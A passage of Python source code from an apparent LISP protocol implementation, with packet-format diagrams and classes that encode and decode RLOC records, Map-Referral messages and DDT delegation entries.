self.source.mask_len = self.source.host_mask_len()
self.dest.mask_len = self.dest.host_mask_len()
format_size = struct.calcsize("HHHH")
if (len(packet) < format_size): return(None)
s, d, l, c = struct.unpack("HHHH", packet[:format_size])
self.udp_sport = socket.ntohs(s)
self.udp_dport = socket.ntohs(d)
self.udp_length = socket.ntohs(l)
self.udp_checksum = socket.ntohs(c)
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is the structure of an RLOC record in a Map-Request, Map-Reply, and
# Map-Register's EID record.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# /| Priority | Weight | M Priority | M Weight |
# L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# o | Unused Flags |L|p|R| Loc-AFI |
# c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \| Locator |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# AFI-List LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 1 | Rsvd2 | 2 + 4 + 2 + 16 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 1 | IPv4 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv4 Address | AFI = 2 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Geo Coordinate LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 5 | Rsvd2 | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |U|N|E|A|M|R|K| Reserved | Location Uncertainty |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Lat Degrees | Latitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Long Degrees | Longitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Altitude |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Radius | Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Explicit Locator Path (ELP) Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 10 | Rsvd2 | n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop k ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Replication List Entry Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 13 | Rsvd2 | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #1 RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #n RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Security Key Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 11 | Rsvd2 | 6 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Count | Rsvd3 |A| Cipher Suite| Rsvd4 |R|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Length | Public Key Material ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... Public Key Material |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Locator Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# JSON Data Model Type Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 14 | kid | Rvd2|E|B| Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | JSON length | JSON binary/text encoding ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Optional Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When the E-bit is set to 1, then the kid is key-id and indicates that
# value fields in JSON string are encrypted with the encryption key
# associated with key-id 'kid'.
#
class lisp_rloc_record(object):
def __init__(self):
self.priority = 0
self.weight = 0
self.mpriority = 0
self.mweight = 0
self.local_bit = False
self.probe_bit = False
self.reach_bit = False
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.rloc_name = None
self.keys = None
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def print_record(self, indent):
rloc_str = self.print_rloc_name()
if (rloc_str != ""): rloc_str = ", " + rloc_str
geo_str = ""
if (self.geo):
name = ""
if (self.geo.geo_name): name = "'{}' ".format(self.geo.geo_name)
geo_str = ", geo: {}{}".format(name, self.geo.print_geo())
#endif
elp_str = ""
if (self.elp):
name = ""
if (self.elp.elp_name): name = "'{}' ".format(self.elp.elp_name)
elp_str = ", elp: {}{}".format(name, self.elp.print_elp(True))
#endif
rle_str = ""
if (self.rle):
name = ""
if (self.rle.rle_name): name = "'{}' ".format(self.rle.rle_name)
rle_str = ", rle: {}{}".format(name, self.rle.print_rle(False,
True))
#endif
json_str = ""
if (self.json):
name = ""
if (self.json.json_name):
name = "'{}' ".format(self.json.json_name)
#endif
json_str = ", json: {}".format(self.json.print_json(False))
#endif
sec_str = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
sec_str = ", " + self.keys[1].print_keys()
#endif
line = ("{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}")
lprint(line.format(indent, self.print_flags(), self.priority,
self.weight, self.mpriority, self.mweight, self.rloc.afi,
red(self.rloc.print_address_no_iid(), False), rloc_str, geo_str,
elp_str, rle_str, json_str, sec_str))
#enddef
def print_flags(self):
return("{}{}{}".format("L" if self.local_bit else "l", "P" \
if self.probe_bit else "p", "R" if self.reach_bit else "r"))
#enddef
def store_rloc_entry(self, rloc_entry):
rloc = rloc_entry.rloc if (rloc_entry.translated_rloc.is_null()) \
else rloc_entry.translated_rloc
self.rloc.copy_address(rloc)
if (rloc_entry.rloc_name):
self.rloc_name = rloc_entry.rloc_name
#endif
if (rloc_entry.geo):
self.geo = rloc_entry.geo
else:
name = rloc_entry.geo_name
if (name and name in lisp_geo_list):
self.geo = lisp_geo_list[name]
#endif
#endif
if (rloc_entry.elp):
self.elp = rloc_entry.elp
else:
name = rloc_entry.elp_name
if (name and name in lisp_elp_list):
self.elp = lisp_elp_list[name]
#endif
#endif
if (rloc_entry.rle):
self.rle = rloc_entry.rle
else:
name = rloc_entry.rle_name
if (name and name in lisp_rle_list):
self.rle = lisp_rle_list[name]
#endif
#endif
if (rloc_entry.json):
self.json = rloc_entry.json
else:
name = rloc_entry.json_name
if (name and name in lisp_json_list):
self.json = lisp_json_list[name]
#endif
#endif
self.priority = rloc_entry.priority
self.weight = rloc_entry.weight
self.mpriority = rloc_entry.mpriority
self.mweight = rloc_entry.mweight
#enddef
def encode_json(self, lisp_json):
json_string = lisp_json.json_string
kid = 0
if (lisp_json.json_encrypted):
kid = (lisp_json.json_key_id << 5) | 0x02
#endif
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
addr_len = self.rloc.addr_length() + 2
lcaf_len = socket.htons(len(json_string) + addr_len)
json_len = socket.htons(len(json_string))
packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, kid,
lcaf_len, json_len)
packet += json_string.encode()
#
# If telemetry, store RLOC address in LCAF.
#
if (lisp_is_json_telemetry(json_string)):
packet += struct.pack("H", socket.htons(self.rloc.afi))
packet += self.rloc.pack_address()
else:
packet += struct.pack("H", 0)
#endif
return(packet)
#enddef
def encode_lcaf(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
gpkt = b""
if (self.geo):
gpkt = self.geo.encode_geo()
#endif
epkt = b""
if (self.elp):
elp_recs = b""
for elp_node in self.elp.elp_nodes:
afi = socket.htons(elp_node.address.afi)
flags = 0
if (elp_node.eid): flags |= 0x4
if (elp_node.probe): flags |= 0x2
if (elp_node.strict): flags |= 0x1
flags = socket.htons(flags)
elp_recs += struct.pack("HH", flags, afi)
elp_recs += elp_node.address.pack_address()
#endfor
elp_len = socket.htons(len(elp_recs))
epkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_ELP_TYPE,
0, elp_len)
epkt += elp_recs
#endif
rpkt = b""
if (self.rle):
rle_recs = b""
for rle_node in self.rle.rle_nodes:
afi = socket.htons(rle_node.address.afi)
rle_recs += struct.pack("HBBH", 0, 0, rle_node.level, afi)
rle_recs += rle_node.address.pack_address()
if (rle_node.rloc_name):
rle_recs += struct.pack("H", socket.htons(LISP_AFI_NAME))
rle_recs += (rle_node.rloc_name + "\0").encode()
#endif
#endfor
rle_len = socket.htons(len(rle_recs))
rpkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_RLE_TYPE,
0, rle_len)
rpkt += rle_recs
#endif
jpkt = b""
if (self.json):
jpkt = self.encode_json(self.json)
#endif
spkt = b""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
spkt = self.keys[1].encode_lcaf(self.rloc)
#endif
npkt = b""
if (self.rloc_name):
npkt += struct.pack("H", socket.htons(LISP_AFI_NAME))
npkt += (self.rloc_name + "\0").encode()
#endif
apkt_len = len(gpkt) + len(epkt) + len(rpkt) + len(spkt) + 2 + \
len(jpkt) + self.rloc.addr_length() + len(npkt)
apkt_len = socket.htons(apkt_len)
apkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_AFI_LIST_TYPE,
0, apkt_len, socket.htons(self.rloc.afi))
apkt += self.rloc.pack_address()
return(apkt + npkt + gpkt + epkt + rpkt + spkt + jpkt)
#enddef
def encode(self):
flags = 0
if (self.local_bit): flags |= 0x0004
if (self.probe_bit): flags |= 0x0002
if (self.reach_bit): flags |= 0x0001
packet = struct.pack("BBBBHH", self.priority, self.weight,
self.mpriority, self.mweight, socket.htons(flags),
socket.htons(self.rloc.afi))
if (self.geo or self.elp or self.rle or self.keys or self.rloc_name \
or self.json):
try:
packet = packet[0:-2] + self.encode_lcaf()
except:
lprint("Could not encode LCAF for RLOC-record")
#endtry
else:
packet += self.rloc.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, nonce, ms_json_encrypt):
packet_format = "HBBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
#
# Process AFI-List LCAF.
#
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE):
while (lcaf_len > 0):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
packet_len = len(packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF):
packet = self.decode_lcaf(packet, nonce, ms_json_encrypt)
if (packet == None): return(None)
else:
packet = packet[format_size::]
self.rloc_name = None
if (afi == LISP_AFI_NAME):
packet, rloc_name = lisp_decode_dist_name(packet)
self.rloc_name = rloc_name
else:
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
#endif
lcaf_len -= packet_len - len(packet)
#endwhile
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
#
# Process Geo-Coordinate LCAF.
#
geo = lisp_geo("")
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
if (packet == None): return(None)
self.geo = geo
elif (lcaf_type == LISP_LCAF_JSON_TYPE):
encrypted_json = rsvd2 & 0x02
#
# Process JSON LCAF.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
json_len = struct.unpack(packet_format, packet[:format_size])[0]
json_len = socket.ntohs(json_len)
if (lcaf_len < format_size + json_len): return(None)
packet = packet[format_size::]
self.json = lisp_json("", packet[0:json_len], encrypted_json,
ms_json_encrypt)
packet = packet[json_len::]
#
# If telemetry, store RLOC address in LCAF.
#
afi = socket.ntohs(struct.unpack("H", packet[:2])[0])
packet = packet[2::]
if (afi != 0 and lisp_is_json_telemetry(self.json.json_string)):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
#endif
elif (lcaf_type == LISP_LCAF_ELP_TYPE):
#
# Process ELP LCAF.
#
elp = lisp_elp(None)
elp.elp_nodes = []
while (lcaf_len > 0):
flags, afi = struct.unpack("HH", packet[:4])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
elp_node = lisp_elp_node()
elp.elp_nodes.append(elp_node)
flags = socket.ntohs(flags)
elp_node.eid = (flags & 0x4)
elp_node.probe = (flags & 0x2)
elp_node.strict = (flags & 0x1)
elp_node.address.afi = afi
elp_node.address.mask_len = elp_node.address.host_mask_len()
packet = elp_node.address.unpack_address(packet[4::])
lcaf_len -= elp_node.address.addr_length() + 4
#endwhile
elp.select_elp_node()
self.elp = elp
elif (lcaf_type == LISP_LCAF_RLE_TYPE):
#
# Process RLE LCAF.
#
rle = lisp_rle(None)
rle.rle_nodes = []
while (lcaf_len > 0):
x, y, level, afi = struct.unpack("HBBH", packet[:6])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
rle_node = lisp_rle_node()
rle.rle_nodes.append(rle_node)
rle_node.level = level
rle_node.address.afi = afi
rle_node.address.mask_len = rle_node.address.host_mask_len()
packet = rle_node.address.unpack_address(packet[6::])
lcaf_len -= rle_node.address.addr_length() + 6
if (lcaf_len >= 2):
afi = struct.unpack("H", packet[:2])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[2::]
packet, rle_node.rloc_name = \
lisp_decode_dist_name(packet)
if (packet == None): return(None)
lcaf_len -= len(rle_node.rloc_name) + 1 + 2
#endif
#endif
#endwhile
self.rle = rle
self.rle.build_forwarding_list()
elif (lcaf_type == LISP_LCAF_SECURITY_TYPE):
#
# Get lisp_key() data structure so we can parse keys in the Map-
# Reply RLOC-record. Then get the RLOC address.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, lcaf_len)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, lcaf_len)
if (packet == None): return(None)
if (len(packet) < 2): return(None)
afi = struct.unpack("H", packet[:2])[0]
self.rloc.afi = socket.ntohs(afi)
if (len(packet) < self.rloc.addr_length()): return(None)
packet = self.rloc.unpack_address(packet[2::])
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#
# Some RLOC records may not have RLOC addresses but other LCAF
# types. Don't process security keys because we need RLOC addresses
# to index into security data structures.
#
if (self.rloc.is_null()): return(packet)
rloc_name_str = self.rloc_name
if (rloc_name_str): rloc_name_str = blue(self.rloc_name, False)
#
# If we found no stored key, store the newly created lisp_keys()
# to the RLOC list if and only if a remote public-key was supplied
# in the Map-Reply.
#
stored_key = self.keys[1] if self.keys else None
if (stored_key == None):
if (key.remote_public_key == None):
string = bold("No remote encap-public-key supplied", False)
lprint(" {} for {}".format(string, rloc_name_str))
key = None
else:
string = bold("New encap-keying with new state", False)
lprint(" {} for {}".format(string, rloc_name_str))
key.compute_shared_key("encap")
#endif
#endif
#
# If we have stored-key, the other side received the local public
# key that is stored in variable 'stored_key'. If the remote side
# did not supply a public-key, it doesn't want to do lisp-crypto.
# If it did supply a public key, check to see if the same as
# last time, and if so, do nothing, else we do a rekeying.
#
if (stored_key):
if (key.remote_public_key == None):
key = None
remote = bold("Remote encap-unkeying occurred", False)
lprint(" {} for {}".format(remote, rloc_name_str))
elif (stored_key.compare_keys(key)):
key = stored_key
lprint(" Maintain stored encap-keys for {}".format( \
rloc_name_str))
else:
if (stored_key.remote_public_key == None):
string = "New encap-keying for existing state"
else:
string = "Remote encap-rekeying"
#endif
lprint(" {} for {}".format(bold(string, False),
rloc_name_str))
stored_key.remote_public_key = key.remote_public_key
stored_key.compute_shared_key("encap")
key = stored_key
#endif
#endif
self.keys = [None, key, None, None]
else:
#
# All other LCAFs we skip over and ignore.
#
packet = packet[lcaf_len::]
#endif
return(packet)
#enddef
def decode(self, packet, nonce, ms_json_encrypt=False):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.priority, self.weight, self.mpriority, self.mweight, flags, \
afi = struct.unpack(packet_format, packet[:format_size])
flags = socket.ntohs(flags)
afi = socket.ntohs(afi)
self.local_bit = True if (flags & 0x0004) else False
self.probe_bit = True if (flags & 0x0002) else False
self.reach_bit = True if (flags & 0x0001) else False
if (afi == LISP_AFI_LCAF):
packet = packet[format_size-2::]
packet = self.decode_lcaf(packet, nonce, ms_json_encrypt)
else:
self.rloc.afi = afi
packet = packet[format_size::]
packet = self.rloc.unpack_address(packet)
#endif
self.rloc.mask_len = self.rloc.host_mask_len()
return(packet)
#enddef
def end_of_rlocs(self, packet, rloc_count):
for i in range(rloc_count):
packet = self.decode(packet, None, False)
if (packet == None): return(None)
#endfor
return(packet)
#enddef
#endclass
#
# Map-Referral Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=6 | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Referral Count| EID mask-len | ACT |A|I| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c |SigCnt | Map Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix ... |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |R| Loc/LCAF-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator ... |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_referral(object):
def __init__(self):
self.record_count = 0
self.nonce = 0
#enddef
def print_map_referral(self):
lprint("{} -> record-count: {}, nonce: 0x{}".format( \
bold("Map-Referral", False), self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REFERRAL << 28) | self.record_count
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is a DDT cache type data structure that holds information configured
# in the "lisp ddt-authoritative-prefix" and "lisp delegate" commands. The
# self.delegatione_set[] is a list of lisp_ddt_node()s.
#
class lisp_ddt_entry(object):
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.delegation_set = []
self.source_cache = None
self.map_referrals_sent = 0
#enddef
def is_auth_prefix(self):
if (len(self.delegation_set) != 0): return(False)
if (self.is_star_g()): return(False)
return(True)
#enddef
def is_ms_peer_entry(self):
if (len(self.delegation_set) == 0): return(False)
return(self.delegation_set[0].is_ms_peer())
#enddef
def print_referral_type(self):
if (len(self.delegation_set) == 0): return("unknown")
ddt_node = self.delegation_set[0]
return(ddt_node.print_node_type())
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_ddt_cache.add_cache(self.eid, self)
else:
ddt = lisp_ddt_cache.lookup_cache(self.group, True)
if (ddt == None):
ddt = lisp_ddt_entry()
ddt.eid.copy_address(self.group)
ddt.group.copy_address(self.group)
lisp_ddt_cache.add_cache(self.group, ddt)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ddt.group)
ddt.add_source_entry(self)
#endif
#enddef
def add_source_entry(self, source_ddt):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ddt.eid, source_ddt)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
#endclass
class lisp_ddt_node(object):
def __init__(self):
self.delegate_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.map_server_peer = False
self.map_server_child = False
self.priority = 0
self.weight = 0
#enddef
def print_node_type(self):
if (self.is_ddt_child()): return("ddt-child")
if (self.is_ms_child()): return("map-server-child")
if (self.is_ms_peer()): return("map-server-peer")
#enddef
def is_ddt_child(self):
if (self.map_server_child): return(False)
if (self.map_server_peer): return(False)
return(True)
#enddef
def is_ms_child(self):
return(self.map_server_child)
#enddef
def is_ms_peer(self):
return(self.map_server_peer)
#enddef
#endclass
#
# This is a Map-Request queue used on a Map-Resolver when waiting for a
# Map-Referral to be retunred by a DDT-node or a Map-Server.
#
class lisp_ddt_map_request(object):
def __init__(self, lisp_sockets, packet, eid, group, nonce):
self.uptime = lisp_get_timestamp()
self.lisp_sockets = lisp_sockets
self.packet = packet
self.eid = eid
self.group = group
self.nonce = nonce
self.mr_source = None
self.sport = 0
self.itr = None
self.retry_count = 0
self.send_count = 0
self.retransmit_timer = None
self.last_request_sent_to = None
